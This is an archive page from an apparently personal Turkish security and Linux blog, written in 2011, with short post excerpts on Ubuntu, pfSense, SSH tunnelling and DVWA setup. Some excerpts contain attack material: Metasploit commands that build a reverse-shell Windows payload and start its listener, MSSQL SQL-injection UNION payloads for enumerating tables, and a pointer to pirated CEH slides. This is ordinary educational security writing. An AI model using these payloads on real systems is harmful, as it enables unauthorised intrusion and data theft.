Ana içeriğe atla

Yayınlar

2011 tarihine ait yayınlar gösteriliyor

Asus N53SN Nvidia Geforce GT 550M Ubuntu Driver Sorunu

Asus N53SN dizüstü bilgisayarıma kurulu bulunan Ubuntu 11.10 üzerinde aşağıdaki komutlarla nvidia ekran kartımı çalıştırmayı başardım. Aşağıdaki komutlar eksik yada fazla olabilir. Aşağıdaki gibi not almışım ama sıcağı sıcağına buraya yazmadığım için emin değilim. Tekrar lazım olursa işe yarayacağını ümit ediyorum :)

wget https://raw.github.com/Bumblebee-Project/Bumblebee/master/cleanup chmod +x cleanup sudo ./cleanup sudo ppa-purge ppa:mj-casalogic/ironhide sudo add-apt-repository ppa:bumblebee/stable sudo apt-get update sudo apt-get install bumblebee sudo usermod -a -G bumblebee  $USERNAME
Bu aşamadan sonra optirun komutu ile uygulamaların Nvidia ekran kartı üzerinde çalışmasını sağlayabilirsiniz. Mesela Urban Terror oyununu Nvidia kart üzerinde çalıştırmak için aşağıdaki gibi bir komut vermeniz yeterli olacaktır.

harun@mordor:$ optirun ./ioUrbanTerror.i386

Hagakure

"İnsan ani bir yağmurla karşılaştığında, ıslanmamaya çalışarak koşar. Fakat yağmurdan kaçınma çabasıyla, evlerin saçaklarının altından gitmeye çalıştığınızda yine de ıslanırsınız. Öte yandan kararlılık gösterip baştan bun razı olursanız, ne metanetiniz bozulur, ne de endişe duyarsınız. Bu anlayış her şeye uygulanabilir."

Python Simple HTTP Server ile Dosya Paylaşımı

Bazen bir dizinde bulunan dosyaların ağ üzerinden bir başka bilgisayara aktarılması gerekiyor. İlgili dizini paylaşıma açmak ve daha sonra ise paylaşımı kapatmak oldukça sıkıntılı bir süreç. Zira ya dosyaları paylaşıma açık bir yere koymanız, muhtelif ağ ayarlarını yapmanız vs gerekiyor...

Bunun yerine Python Simple Http Server bileşenini kullanarak her hangi bir dizini tek komutla Web paylaşıma açabilir ve daha sonra da CTRL+C tuş kombinasyonu ile açtığınız web paylaşımını kapatabilirsiniz...

Tek yapmanız gereken bir konsol açmak ve dosyalarını paylaştırmak istediğiniz dizine girmek. Sonrasında konsola aşağıdaki komutu yazarak o dizindeki dosyaları 8080 numaralı porttan sunmaya başlayabilirsiniz.

python -m SimpleHTTPServer 8080

Marmara Üniversitesi CEH Semineri

30 Kasım 2011 tarihinde Marmara Üniversitesi Bilgisayar Mühendisliği Kulübü tarafından organize edilen etkinlikte "Hacker Kültürü ve Etik Hacker" konulu bir konuşma yaptım.

Ozan Uçar ve Emre Tınaztepe çok keyifli ve son derece teknik uygulamaları gerçekleştirdiler. Ben ise daha çok gelecekte Bilgi Güvenliği alanında kariyer yapmak isteyen arkadaşlar için öneriler sunduğum teknik olmayan bir sunum yaptım...

Konuşmam sırasında kullandığım "Hacker Kültürü ve Etik Hacker" konulu sunum dosyasına buradan ulaşabilirsiniz :)

Buffer Overflow Üretecek Programcı Nasıl Yetiştirilir

Yukarıdaki örnek "Bilgisayar Programlama I" dersinde "dizi" kavramının anlatıldığı kısımde yer alan örneklerden birisi. Ancak deneyimli programcılar bu kodun hatalı olduğunu ve istenmeyen sonuçlar ortaya çıkartacağını fark etmişlerdir.Bu durumu fark etmeyenler için bu eğlenceli hata hakkında bir şeyler yazmak istiyorum...

Linux Kullanıcı ve Grup İşlemleri

Linux sistemlerde yeni bir kullanıcı eklemek için useradd komutu kullanılabilir. Aşağıdaki komut hakan isminde yeni bir kullanıcı hesabı açacaktır.

root@gondor:/home# useradd -m  -G admin,cdrom  hakan
-m paramesi kullanıcı için ev dizini oluşturulmasını sağlar.
-G parametresi kullanıcının üye olduğu grupları belirtir.

Şimdi hakan kullanıcına parolasını atamak için passwd komutunu kullanalım.

root@gondor:/home# passwd hakan Yeni parolayı girin: Yeni parolayı tekrar girin: passwd: şifre başarıyla güncellendi
Şimdi hakan kullanıcısını "disk" grubuna eklemek için aşağıdaki gibi bir komut verelim.

root@gondor:/home# usermod -a -G disk hakan
Bakalım hakan kullanıcısı hangi gruplara üyeymiş. Bunun için id komutunu "id kullanıcıadı" şeklinde kullanalım.
root@gondor:/home# id hakan uid=1001(hakan) gid=1001(hakan) gruplar=1001(hakan),6(disk),24(cdrom),118(admin)
Yukarıdaki çıktıya göre hakan kullanıcısı hakan, disk,cdrom ve admin gruplarına üyeymiş. Şimdi hakan kullanıcısını …

Ubuntu Linux Vmware Uninstall

Olur da bir gün Ubuntu Linux üzerinde kurulu olan Vmware yazılımını kaldırmak isterseniz öncelikle bilgisayarınızda bulunan vmware yazılımlarını tespit etmeniz gerekir. Bunun için aşağıdaki komutu kullanabilirsiniz.

root@mordor:~# vmware-installer --list-products  Product Name           Product Version     ====================== ==================== vmware-workstation     7.1.4.385536
Listede görmüş olduğunuz vmware yazılımını kaldırmak için ise aşağıdaki gibi bir komut kullanabilirsiniz.

root@mordor:~# vmware-installer --uninstall-product vmware-workstation
Bu komuttan sonra açılan sihirbaz (wizard) ekranındaki adımları takip ederek vmware yazılımını kaldırabilirsiniz...








FreeBSD için Perl WWW::Curl Kurulumu

FreeBSD 8 üzerinde perl betikleri çalıştırmak için öncelikle perl kurulumu yapmanız gerekir. FreeBSD 8 üzerinde Perl kurulumu yapmak için aşağıdaki komutu kullanabilirsiniz.

pkg_add -rv ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-8.2-release/Latest/perl.tbz

Artık perl betiklerini çalıştırabilirsiniz. Ancak perl betikleri ile curl işlemleri yapmak için, perl in WWW::Curl bileşenin kurulu olması gerekir. Eğer WWW:Curl bileşeni kurulu değilse Curl işlemi yapmak istediğinizde betiğiniz aşağıdaki gibi bir hata olacaktır...

Can't locate WWW/Curl/Easy.pm in @INC (@INC contains: /usr/local/lib/perl5/5.12.4/BSDPAN /usr/local/lib/perl5/site_perl/5.12.4/mach /usr/local/lib/perl5/site_perl/5.12.4 /usr/local/lib/perl5/5.12.4/mach /usr/local/lib/perl5/5.12.4 .) at /usr/local/openssl/misc/tsget line 10. BEGIN failed--compilation aborted at /home/harun/curl-test.pl line 10

Bu durumda aşağıdaki gibi bir komutla p5-WWW-Curl.tbz paketini kurarak "Can't locate WWW/Curl/Easy.p…

Linux Default TTL Değerini Değiştirmek

TTL (Time To Live) değeri ağda dolaşan paketlerin yaşam süresini belirleyen bir değerdir. Bu değer geçilen her router tarafından bir azaltılarak bir sonraki router'a yollanır. Bu sayede hedefine ulaşamayan veya routerlar arasında kısa döngüye giren paketlerin sonsuza kadar ağda dolaşmaları engellenir...

Aynı zamanda bu değer uzaktaki bir sistemin işletim sistemini kabaca tahmin etmekte kullanılabilir. Zira modern MS Windows işletim sistemleri TTL değerini 128 kullanırken, eski Windows sistemler 32 değerini kullanır. Linuxlar genellikle 64 kullanırken bazı Unix ve Linuxlar 255 değerini kullanırlar...

Ağda dolaşan paketlerin TTL değerlerine bakarak işletim sistemi hakkında fikir yürütmek mümkün olabilir ancak bu tahminin doğruluğu kesin değildir ve oldukça geniş bir işletim sistemi grubunu kapsar... Daha doğru bir tahmin yapmak için diğer TCP/IP davranışlarını test etmek ve elde edilecek bulgulara göre karar vermek gerekir. İşletim sistemi tespiti konusunu bir başka yazıya bırakıp …

Ubuntu Terminal Server Client VNC ve XDMCP Desteği

Ubuntu sistemlerde gelen uzak masaüstü istemcisi olan tsclient ( Terminal Server Client) aracı XDMCP ve VNC protokollerini desteklemesine rağmen standart haliyle bu özellikler aktif değildir.

tsclient aracını kullanarak XDMCP ve VNC bağlantıları yapmak istiyorsanız bir kaç paket kurulumu yaparak bu özellikleri aktif etmeniz gerekir.

XDMCP Desteği Kurulumu
Aşağıdaki gibi bir komutla Xnest paketini kurarak tsclient aracına XDMCP protokol desteğini kazandırabilirsiniz.

apt-get install xnest

VNC Desteği Kurulumu
VNC desteği için ise aşağıdaki komutla  xtightvncviewer paketini kurmanız yeterli olacaktır.

apt-get install xtightvncviewer
Bu noktadan sonra Terminal Server Client aracında XDMCP ve VNC protokolleri aşağıda görüldüğü gibi aktif halde kullanılır hale gelecektir.


Ubuntu 11.04 LTP - Linux Terminal Server Kurulumu

Ubuntu 11.04 Desktop üzerine Linux Terminal Server nasıl kurulur maceramın küçük notlarını yazayım. Hem ben, tekrar lazım olduğunda "Bunu nasıl yapıyorduk?" diye düşünmekten kurtulayım hemde benzer bir çalışma için arama yaparken bu yazıya ulaşan olursa kaynak oluşturmuş olayım...

Sunucu İçin Ağ Ayarları
Terminal Sunucu için öncelikle kurulum yapacak sisteme sabir bir IP adresi vermek gerekir.Bunun için  /etc/network/interfaces dosyasını uygun bir şekilde düzenlemeniz gerekir. Benim kullandığım örnek dosya aşağıdaki gibidir.
auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.5.200 netmask 255.255.255.0 network 192.168.5.0 broadcast 192.168.5.255 gateway 192.168.5.254
Terminal Server  Kurulumu
Ağ ayarlarının ardından Terminal Server paketini kurmak için aşağıdaki komutu vermek yeterli olacaktır.

root@mordor:~# apt-get install ltsp-server-standalone
Bu komut paket deposundan terminal server oluşturmak için gerekli paketleri yükleyecektir. Bu aşamad…

Ubuntu 11.04 - 10.04 Vmware Kurulumu

Eski bloğumdaki "Ubuntu 10.04 için Vmware Kurulumu" konulu yazım hala çok sayıda ziyaretçi almaya devam ediyor gibi görünüyor. Bende Ubuntu 11.04 üzerinde Vmware kurulumu için de işe yarayan eski yazımı buraya ekleyeyim diye düşündüm. Aşağıda bahsedilen yöntem Ubuntu 10.04 ve 11.04 sürümleri arasında kalan tüm Ubuntu sürümlerinde işe yarıyor. İşte o eski yazım...

Ubuntu 10.04 üzerine Vmware'i kurmam gerektiğinde daha önceden bir çok kez çözmek zorunda kaldığım ancak tembellikten bir türlü not almadığım kurulum sorunlarıyla karşılaştım. Bu kez sıcağı sıcağına not alayım ve ihtiyaç duyulduğunda burada bulabileyim dedim...

İlk olarak yapmamız gereken şey aşağıdaki gibi bir komutla vmware'in ihtiyaç duyacağı paketleri yüklemek olsun.

apt-get install linux-headers-`uname -r` build-essential
Vmware kululumu sırasında aşağıdaki gibi bir hata alabilirsiniz.
Extracting VMware Installer...done. File "/usr/lib/vmware-installer/1.1/python/lib/sqlite3/__init__.py", line…

Ubuntu GDM ve XDMCP ile X Server Bağlantısı

Linux sistemlerde grafik ortamı oluşuturan X kendi başına bir sunucu olup yerel veya uzak bilgisayarlara hizmet verebilir. Bu nedenle aslında Linux sistemlerin doğuştan "Uzak Masaüstü" desteği vardır. Ancak bu destek günümüzde pek kullanılmadığından genellikle açık olarak gelmez bu nedenle kullanmak isterseniz sizin açmanız gerekir...

Bir Ubuntu sistemin uzaktan gelecek X bağlantılarını kabul etmesi için, Ubuntu sistemlerde standart olarak gelen GDM servisinde bir kaç küçük ayar yapmak gerekiyor...

/etc/gdm/custom.conf dosyası içerisine aşağıdaki satırları ekliyoruz. Bu dosya yoksa oluşturuyoruz.

[xdmcp] Enable=true [security] DisallowTCP=false
Daha sonra ise aşağıdaki komutla gdm servisini yeniden başlatıyoruz.

sudo service gdm restart
Bu aşamadan sonra doğrudan X sunucu, Xnest veya Windows platformu için Xming gibi araçlar kullanarak X sunucuna bağlanabilirsiniz.

SVN Deposu Nasıl Taşınır

Olurda bir gün kullanmakta olduğunuz svn deposunu başka bir sunucuya vs taşımanız gerekirse bu iş için svnadmin komutunun dump parametresini kullanabilirsiniz...

Önce var olan deponusu svnadmin dump ile tek dosya halinde kayıt edin.

svnadmin dump /var/svn-repos/seker > ./seker.svndump
Yukarıdaki komut svn sunucudaki seker isimli depoyu seker.svndump adında bir dosya olarak saklayacaktır. Bu dosyayı hedef svn sunucuna taşıdıktan sonra yeni sunucumuzdaki yeni depomuzu oluşturalım.

svnadmin create --fs-type fsfs /var/svn-repos/seker

Yeni depo oluşturulduğuna göre dump dosyasındaki verilerimizi yeni depomuza aktarabiliriz.

svnadmin load /var/svn-repos/seker < ./seker.svndump
Yukarıdaki komut işini bitirdiğinde yeni svn sunucunuza taşınmış olacaksınız...



ARP Cache Clear

Network ile uğraşırken zaman zaman ARP Cache belleğini temizlemek gerekiyor. Zira ağda bir şeyler değiştiğinde bilgisayarınızın ARP Cache'inde tutulan IP-MAC eşleşmeleri değişmiş olabiliyor. Bir süre sonra bilgisayarınız yeni IP-MAC eşleşmesini keşfediyor olsada bunun için beklemek istemiyorsanız ARP Cache belleğini temizlemek için aşağıdaki gibi bir komut kullanılabilir.

for i in `awk -F ' ' '{ if ( $1 ~ /[0-9{1,3}].[0-9{1,3}].[0-9{1,3}].[0-9{1,3}]/ ) print $1 }' /proc/net/arp` ; do arp -d $i ; done

Facebook Chat Sniffer

Bu belgede anlatılanlar 2011 yılında yazılmış olup güncelliğini kaybetmiştir ve artık çalışmamaktadır!

Önemli Not:  Yaklaşık 9 ay önce yazılmış olan bu yazı ile ilgili olarak "maksadını aşan","edepsiz" ve "lüzumsuz" yorumlar almaktan sıkıldığımdan bu konu ve yorumları kapatılmıştır... Yorumlara ve sorulara cevap verilmeyecektir...

Eski insanlar doğru söylemiş...  "Kötüye İyilik Yapan Evine Sağ Dönemezmiş"
EOF

Pek çoğumuz sosyal ağlara üyeyiz ve PC başında geçen zamanımızın önemli bir kısmını başta facebook olmak üzere sosyal ayğalarda geçiyor. Üstelik pek çok insan facebook chat özelliğini kişisel iletişim için kullanmaya başlamış durumda. Hatta pek çok anlık mesajlaşma yazılımı facebook chat protokolü üzerinden görüşme yapılmasına izin verir hale geldi...

İşte bu noktada "Olur da günün birinde facebook sohbet kayıtlarını tutmanız gerekirse ne yaparsınız?" sorusu akla geliyor...

Böyle bir ihtiyacınız olduğunda açık kaynak kodlu özgür y…

Çok Sık Unuttuğum Metasploit Komutları

Sanıırm artık hafızam eskisi kadar kuvvetli değil. Bu nedenle pek çok şeyi hatırlamakta zorlanıyorum. Lazım olduğunda hatırlayamadığım bu nasıl kullanılıyordu diye cebelleşmek zorunda kaldığım bir kaç metasploit komutunu buraya not alayım diye düşündüm...

Dinleme Moduna Geçmek
Aşağıdaki komutla metasploit dinleme moduna geçerek gelecek bağlantıları beklemeye başlayacaktır. Çalışan payload işlevini yakalayıp kullanabilmek için gereklidir...

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.2.124 LPORT=9999 E Payload için EXE oluşturma
Payload kodu ikilik hale getirilip Windows sistemlerde çalıbilecek exe dosyasına dönüştürülür. Bir şekilde bu bu exe dosyası çalıştırıldığında Payload işlevi yürütülecektir...

msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.5.124 LPORT=8888 X > /root/test.exe
Uzun süre önce bu yöntemi, bilgisayarıyla arası iyi olmayan romanyadaki bir müşterimizin teamvewer gibi bir aracı çalıştıramıyor olması nedeniyle kullanmış ve…

pfSense 2.0 Kararlı Sürüm Çıktı

pfSense 2.0 nihayet kararlı sürüme ulaştı. pfSense geliştiricilerinden Chris Buechler bu girdisinde "pfSense 2.0 release is building right now." diyor ve pfSense git deposunundan şu linki veriyor...

pfSense 2.0 kararlı sürüm için bu girdinin yazıldığı saatlerde iso imajı bulunmuyor ancak build süreci devam ediyordu...

pfSense 2.0 sürümüne kavuşmak için sabırsızlanıyorsanız https://github.com/bsdperimeter/pfsense bağlantısından pfSense 2.0 Release sürümüne ait dosyalara ulaşabilir, hatta https://github.com/bsdperimeter/pfsense-tools bağlantıdaki araçları kullanarak kendi pfSense dağıtımınızı oluşturabilirsiniz.

Ancak derleme işleminin uzun ve sancılı olacağı gerçeğini göz önüne alırsanız şu andan sonra iso imajının http://snapshots.pfsense.org/ adresine düşmesini beklemek daha cazip olacaktır gibime geliyor...

NOT: Artık http://pfsense.phoenixkv.net/downloads/ adresinden pfSense 2.0 Release indirilebilir durumdadır...

SSH Tunel

SSH protokolünün en güzel özelliklerinden birisi de tünel kazılabilmesine imkan vermesidir. Aşağıdaki gibi bir ağ şeması üzerinde bir kaç örnek ile neler yapabileceğimizi yazalım...


SSH Server ve Proxy Server isimli sunucular firewall ardında yer almakta olup, SSH Server Internet üzeründen port yönlendirmeyle erişilebilir durumdadır. Gondor isimli bilgisayar internet üzerinden SSH server isimli sunucuya SSH ile erişebiliyor. Ancak Proxy Server sunucusuna erişim firewall tarafından engellenmiş durumdadır.

Dinamik SSH Tüneli Oluşturmak
Bu senaryomuzda dinamik ssh tüneli oluşturalım ve gondor bilgisayarı ssh ile bağlandığı SSH Server bilgisayarı üzerinden web sayfalarına ulaşsın. Bunun için gondor bilgisayarı aşağıdaki gibi bir komut verebilir.

ssh -D 8888 root@11.22.33.44

FFMpeg FLV - MP3 Converter

Zaman zaman video ve ses dosyalarını dönüştürmem gerekiyor. Bunun için ffmpeg kullanıyor olsam da çok sık kullanmadığım için hangi parametre ne yapıyordu hatırlamıyorum. Bu yüzden de ihtiyaç duydukca Google amcaya danışıp işleri halletmeye çalışıyorum. Tabii ki bu oldukça sancılı bir süreç haline geliyor...

Bu kez de flv dosyasından mp3 oluşturmak istedim. Yine google amcaya danıştım ancak bu kez aşağıdaki komutla dönüştürme işlemi yapmak istediğimde aşağıdaki hata mesajını almaya başladım...

ffmpeg -i ornek.flv -acodec libmp3lame -ab 128k ornek.mp3 ... Unknown encoder 'libmp3lame'
ffmpeg  "Unknown encoder 'libmp3lame'" diyerek dönüştürme işlemini yapmıyordu. Çözüm olarak aşağıdaki komutla libavcodec-extra-52 paketini kurmak gerekiyor.

sudo apt-get install libavcodec-extra-52

Daha sonra ise aşağıdaki komutu vererek mutlu sona erişebiliyoruz...

ffmpeg -i ornek.flv -acodec libmp3lame -ab 128k ornek.mp3

Damn Vulnerable Web Application Kurulumu

Bilişim güvenliği ile ilgilenen, bu alanda kendini geliştirmeyi hedefleyen herkesin en büyük sorunlarından birisi pratik yapacak alan bulmanın zorluğudur. Bu noktada iki seçenek söz konusudur. Ya ayın karanlık tarafına geçip bir başkasının sistemlerini kurcalarsınız ya da Damn Vulnerable Web Application gibi bir web uygulamasını kullanırsınız...

Damn Vulnerable Web Application (Türkçe mealiyle "Kahrolası Savunmasız Web Uygulaması"),  web uygulamalarında görülen SQL Injection, File Include,XSS, CSRF, Command Execution gibi zaafiyetleri barındıran bir web uygulamasıdır...

Düşük, Orta, Yüksek olmak üzere üç farklı seviyede örnek web uygulamaları yer almaktadır. Düşük ve Orta seviyede mutelif güvenlik açıkları olup amacı bu açıkları istismar etmeniz ve temel hacking becerinizi geliştirmenizdir...

DVWA Kurulumu
DVWA yazılımını http://www.randomstorm.com/dvwa-security-tool.php adresinden indirebilirsiniz. Bu noktada Live CD veya kurulum paketi olarak iki farklı seçeneğe sahipsiniz.…

chflags ile Dosyaları Silinemez Yapmak

FreeBSD sistemlerde bir dosyayı silinemez yapmak için aşağıdaki komut kullanılarak dosya, sistem değişmezi olarak atanabilir.

chflags schg dosyaadi
Bu komut root yetkileriyle verildikten sonra, sistem değişmezi bayrağı kaldırılmadığı sürece bu dosya üzerinde değişiklik yapmak veya dosyayı silmek mümkün olmaz...

Aynı dosyadan sistem değişmezi bayrağını kaldırmak ve tekrardan silinebilir hale getirmek için ise aşağıdaki komut verilebilir.

chflags noschg dosyaadi
Önce touch ile bir dosya oluşturalım, ardından chflags ile sistem değişmezi olarak ayarlayalım ve silmeyi deneyelim. Daha sonra ise chflags ile normal dosya olarak ayarlayalım ve dosyayı silelim...

[2.0-RC3][root@pfSense.localdomain]/root(25): touch harun.txt [2.0-RC3][root@pfSense.localdomain]/root(26): ls -alh harun.txt -rw-r--r--  1 root  wheel     0B Aug 10 09:50 harun.txt [2.0-RC3][root@pfSense.localdomain]/root(27): chf chflags chfn    [2.0-RC3][root@pfSense.localdomain]/root(27): chflags schg harun.txt [2.0-RC3][ro…

Resident Evil 5

Bir süredir uygun bulduğum her fırsatta Resident Evil 5 oyunuyla meşgul olarak stres atıyorum. Düzeltiyorum. Bir süredir Resident Evil 5 oyunuyla strese giriyorum. Zira oyyun oynamaktan anlamayan odun ruhlu birisi değilseniz oyun sizi epeyce gerebiliyor...

Oynanabilirlik ve aksiyon Resident Evil 4 e göre çok daha iyi durumda. En azından fare desteği eklenmiş. Böylece hareket etmek ve nişan almak için farenizi kullanabiliyorsunuz. Bu PC oyuncuları için çok güzel bir gelişme...

Diğer yandan eski serilerdeki alengirli bulmacalar yerini daha yüksek aksiyona bırakmış. Oyun daha çok "önüne geleni vur" oyunu tarzında olmuş. Resident Evil 4 kadar zorlu olmamış ancak oldukça keyifli...

Oyunda eski karakterlerden biri olan Chris Redfield ı canlandırıyoruz. Bu kez yanımızda Sheva isimli oldukça alımlı koyu esmer bir bayan partnerimiz oluyor. Üstelik arbede sırasında ciddi anlamda yardımcı oluyor ve tam anlamıyla "nazik poponuz koruyor".

Oyun şekli olarak tekli ve çoklu oyuncu…

Ubuntu, Aireplay-ng, Atheros AR9285, mon0 Channel -1 Problemi

Bir süre önce kullandığım Intel 4965 kablosuz ağ kartı ile "Channel -1" sorunu yaşadığımı ve bu sorunu çözmek için neler yaptığımı yazmıştım. Aireplay-ng ile paket sokuşturma yapmaya çalıştığımda aireplay-ng aşağıdaki hatayı veriyor ve çalışmıyordu.

21:09:28  mon0 is on channel -1, but the AP uses channel 1
Daha sonra emektar dizüstü bilgisayarımın ekran sorunları nedeniyle yeni bir makine almak zorunda kaldım. Tabii doğal olarak yeni makine (Asus N53SN) yeni bir kablosuz ağ arabirimi (Atheros 9285) demekti.

root@gondor:~# lspci | grep Wireless 03:00.0 Network controller: Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

Aynı sorunu bu kez "AR9285 Atheros wireless network adapter" için çözmek zorunda kaldım. Aynı şeyleri Intel 4965 için daha önce de yazdığımdan, bu kez yapılacakları kısaca özetliyorum.

İlk olarak yeni sürücümüzü indirilerim wireless.kernel.org adresinden indirelim ardından da gerekli yamaları indirip sürücü kayna…

CEH v7 Slaytları

CEH v7 için hazırlanan slaytlar, uzun süredir torrentler ve dosya paylaşım sitelerinde dolaşıyor olsa da DRM korumalı olduğundan içeriğine erişilemiyordu.

Birileri CEH v7 slaytlarının muhtemelen ekran görüntülerini alıp sunum haline getirmiş ve DRM koruması olmaksızın yayımlamış. İgilenenler küçük bir google / torrent aramasıyla temin edebilir.

Not: DRM ve benzeri konular için Richard Stallman tarafından yazılan ve http://www.belgeler.org/howto/bilgisayariniza-guvenebilir-misiniz.html adresinden Türkçe çevirisine erişebileceğiniz "Bilgisayarınıza Güvenebilir Misiniz?" makalesini okuyabilirsiniz.

pfSense Captive Portal + Squid Bypass Problemi

pfSense üzerinde gelen Captive Portal, kullanıcıların internete erişimini engelleyen ancak kullanıcı adı ve parolası ile oturum açan kullanıcıların internetene çıkmasını sağlayan bir uygulamadır...

Standart olarak pfSense üzerinde Squid paketi bulunmadığından Captive Portal kullanımında sıkıntı yaşanmaz. Ancak sistem yöneticileri pfSense üzerine Squid Proxy paketini kurduklarında pek fark edilmeyen küçük bir problem ortaya çıkar.

Herhangi bir kullanıcı Squid servisinin çalıştığını fark eder ve web tarayıcısındaki vekil sunucu (proxy) ayarlarını değiştirerek Captive Portal uygulamasını aşağıdaki videoda görüldüğü gibi atlatabilir.

PHP Error Reporting

PHP kodu yazıyorsanız ve yaptığınız hatalar, php.ini dosyasında display_errors off olduğu için yüzünüze vurulmuyorsa bu durum çok can sıkıcı oluyor. Zira web sunucusu nerede yanlış yaptığınızı yüzünüze söylemek yerine gidip arkanızdan log dosyasına falan yazıyor :)

Böyle durumlarda web sunucunu delikanlı olup yüzünüze karşı konuşmaya ikna etmek için ini_set ile display_errors ayarını On yapmak gerekiyor...

ini_set('display_errors','On'); ini_set('error_reporting', E_ALL); error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
Bu error_report olayını bu kadar abartıp web sunucunu kişiselleştirerek sorun haline neden getirdim bende bilmiyorum. Ama olurda lazım olursa böyle bir vukuaatımız var. Ahanda yazdım buraya... :)

Bash For While Deyimi

Linux komut satırındaki en güzel özellik, Linux komut satırının programlanabilir olmasıdır. Basit bir for döngüsü aşağıdaki gibi yazılabilir.

harun@gondor:/tmp$ for ((i=0;$i<10;i=$i+1)); do echo $i; done;
Benzer şekilde bir while döngüsü yazmak da mümkün;

harun@gondor:/tmp$ i=0;while(($i<10));do echo $i; i=$(($i+1));done;

Traceroute Çıktısında Görünmeyen PfSense

pfsense 2.0 RC3 sürümü üzerinden internete çıkıyorsanız traceroute yaptığınızda aradaki pfsense makinenizin traceroute çıktısında görünmemesi gibi garip bir durumla karşılaşabilirsiniz.

Aşağıdaki çıktıda  192.168.1.1 IP adresli pfSense görünmüyor.

harun@gondor:~$ traceroute 8.8.8.8 traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets  1  10.0.0.254 (10.0.0.254)  3.032 ms  3.832 ms  7.167 ms  2  78.173.128.1 (78.173.128.1)  11.236 ms  11.245 ms  11.242 ms ..... 10  209.85.249.162 (209.85.249.162)  86.819 ms * * 11  google-public-dns-a.google.com (8.8.8.8)  85.062 ms  86.394 ms  68.298 ms

Yukarıdaki çıktıyı ilk gördüğümde ilk önce "nasıl yani?" tepkisini vererek gerçekten pfsense üzerinden geçip geçmediğimi kontrol ettim. Daha sonra ise pfSense üzerinden geçtiğim halde neden cihazın trace çıktısında görünmediğini araştırmaya başladım...

Mesele pfSense'in LAN bacağındaki firewall kuralından kaynaklanıyormuş. Kural "Policy based routing" yaptığı için arada…

MMS Video Download

Webde dolaşırken görüp beğendiğiniz ama nasıl indirsem diye düşündüğünüz mms:// videoları için mplayer güzel bir çözüm. Tek yapmanız gereken aşağıdaki gibi bir komut vermekten ibaret.

harun@gondor:~$ mplayer -dumpstream video_adresi
Yukarıdaki  komutu verdiğinizde mplayer videoyu ekranda oynatmak yerine stream.dump adıyla bir dosyaya yazacaktır. Bir yandan indirip bir yandan izlemek isterseniz aşağıdaki gibi bir komutla ikinci bir mplayer çalıştırabilirsiniz...

harun@gondor:~$ harun@gondor:~$ mplayer stream.dump
Mplayer yazılımını dağıtımınızn paket deposundan veya http://www.mplayerhq.hu adresinden mplayer indirerek kurabilirsiniz...

Önemli Not: Bu özelliği kullanırken telif haklarını ihlal etmediğinizden emin olun :)

Captive Portal Ek Özellikler

PfSense üzerinde gelen Captive Portal özelliği hot spot çözümü olarak kullanılabilecek güzel bir özelliktir. Captive Portal, kablosuz ağınıza dahil olan kullanıcıların tüm internet erişimlerini engeller ve web sayfalarına erişmek isteyen kullanıcılara bir karşılama ekranı getirerek oturum açmalarını ister.

İnternete erişmek isteyen kullanıcı, kendisine ait kullanıcı adı ve parolası ile oturum açarak internet erişimi sağlayabilir. Bu nedenler kafeler, oteller ve benzeri yerler ile misafirlerini kendi yerel ağlarına bağlamak istemeyen şirketler için oldukça güzel bir çözümdür. Ancak hali hazırda var olan özellikleriyle Captive Portal yeterince kullanışlı değildir.

Bu nedenle  PfSense üzerinde bir şeyler yazmam ve sistemi modifiye etmem gerekmişti. Bu çalışma sırasında aşağıdaki özellikler sisteme eklemiştim...
Captive Portal da kullanıcı hesapları açabilen ancak sistemin geri kalan ayarlarına ulaşamayan bir sınırlı kullanıcı hesabı.Saat sınırlamalı kullanıcı hesabı açılabil…

FreeBSD Dansguardian Kurulumu

FreeBSD 8 üzerinde dansguardian kurulumu yapmak için ilk olarak pcre paketini kuralım.

pkg_add -rv pcre #Fetching ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-8.1-release/Latest/pcre.tbz
Ardından pkg-config paketini kuralım.
pkg_add -rv pkg-config #Fetching ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-8.1-release/Latest/pkg-config.tbz...Waiting for final status
Şimdi dansguardian indirelim...
fetch http://dansguardian.org/downloads/2/Stable/dansguardian-2.10.1.1.tar.gz
İndirdiğimiz dosyayı distfiles a kopyalalım. Dansguardian ticari olduğu için port aracı, kendisi indirmiyor. İndirme işlemini bizim yapmamızı istiyor.

cp /root/dansguardian-2.10.1.1.tar.gz /usr/ports/distfiles/
Dansguardian için port ağacına gidelim...

cd /usr/ports/www/dansguardian
Dansguardian'ı derleyip sisteme kurmak için

make & make install
Port ağacından derleyip dansguradian paketi oluşturmak için ise

make package

SQL Enjeksiyonunda Kayıt İlerletme

Bir pentest çalışması sırasında MSSQL kullanan bir web uygulamasında SQL Enjeksiyonuna sebebiyet verecek bir girdi doğrulama/filtreleme zaafiyet keşfettim. Web uygulaması muhtelif SQL sorgularını çalışıtrabiliyordu.

INFORMATION_SCHEMA.TABLES tablosundan, tablo isimlerini çekmeye çalıştığımda söyle bir sorunla karşılaştım. SQL sunucu WHERE deyimine yanıt vermiyordu.

Bu durumda SQL e biraz takla attırmam ve aşağıdakine benzer şekilde iç içe sorular kullanmam gerekti.

UNION ALL SELECT TOP 1 1,2,3,(select top 1 table_name FROM (select top 1 table_name from INFORMATION_SCHEMA.TABLES order by table_name ASC) sq order by table_name DESC),4,5,6  -- UNION ALL SELECT TOP 1 1,2,3,(select top 1 table_name FROM (select top 2 table_name from INFORMATION_SCHEMA.TABLES order by table_name ASC) sq order by table_name DESC),4,5,6  --
Bu sorgulardan en içteki select deyimi, top X ifadesi ile tablonun başından X kaydıartan artan sıralamada çekiyor. Bunın dışındaki select deyimi ise ilk sorgunun döndürdü…

Bir Saldırı Hikayesi

Web sunucularımız üzerinde muhtelif betik dilleriyle yazılmış olan web uygulamaları çalıştırıyoruz. Genellikle çalışan web uygulamalarının iyi niyetli olmasından dolayı web sunucularımız genellikle standar kurulduğu halde kalıyor. Özel bir yapılandırma veya güçlendirme yapmaksızın kullanıcıların sunucularımza dosya yüklemesine ve çalıştırmasına izin veriyoruz. Buradaki önemli soru web sunucularımızda çalışacak olan PHP, ASP, Python gibi betiklerin neler yapabileceği...

